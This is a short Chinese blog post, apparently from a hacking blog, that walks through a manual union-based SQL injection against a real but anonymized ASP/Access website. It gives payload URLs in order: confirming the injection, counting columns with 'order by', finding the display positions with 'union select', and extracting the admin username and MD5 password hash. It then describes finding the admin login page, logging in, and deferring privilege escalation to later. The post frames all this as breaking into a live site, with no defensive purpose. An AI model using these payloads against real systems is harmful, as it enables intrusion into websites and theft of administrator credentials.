【实战】利用联合查询--手工SQL注入拿下网站
看到很多脚本小子,工具党用啊D,明小子,穿山甲对网站扫来扫去,拿个后台什么的,其实基础是最重要的,今天我来说一下纯手工注入一个站点。
目标网址:http://www.******.com/about.asp?id=1
1.首先确认这里是否存在整型注入,很简单,url后加‘ and 1=1 and 1=2,不细说。同时我们还判断出这是Access的数据库。
2.利用order by判断表项有几个;
http://www.******.com/about.asp?id=1 order by 4(这里的5报错,4正确,就是4个了)
3.然后测试显示位,2,3位可显;
http://www.******.com/about.asp?id=1 and 1=2 union select 1,2,3,4 from admin
4.在显示位猜测字段值;这里的表名,字段名根据经验来试;常见的就那几种;我们得到了用户名和密码(MD5加密的);
http://www.******.com/about.asp?id=1 and 1=2 union select 1,username,3,4 from admin
http://www.******.com/about.asp?id=1 and 1=2 union select 1,password,3,4 from admin
5.拿到用户名密码后,寻找后台,常见的admin/login/manager/admin_login等可以试一试,成功登陆,搞定。提权后面再说咯。
本文出自 “夜行者” 博客,转载请与作者联系!
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。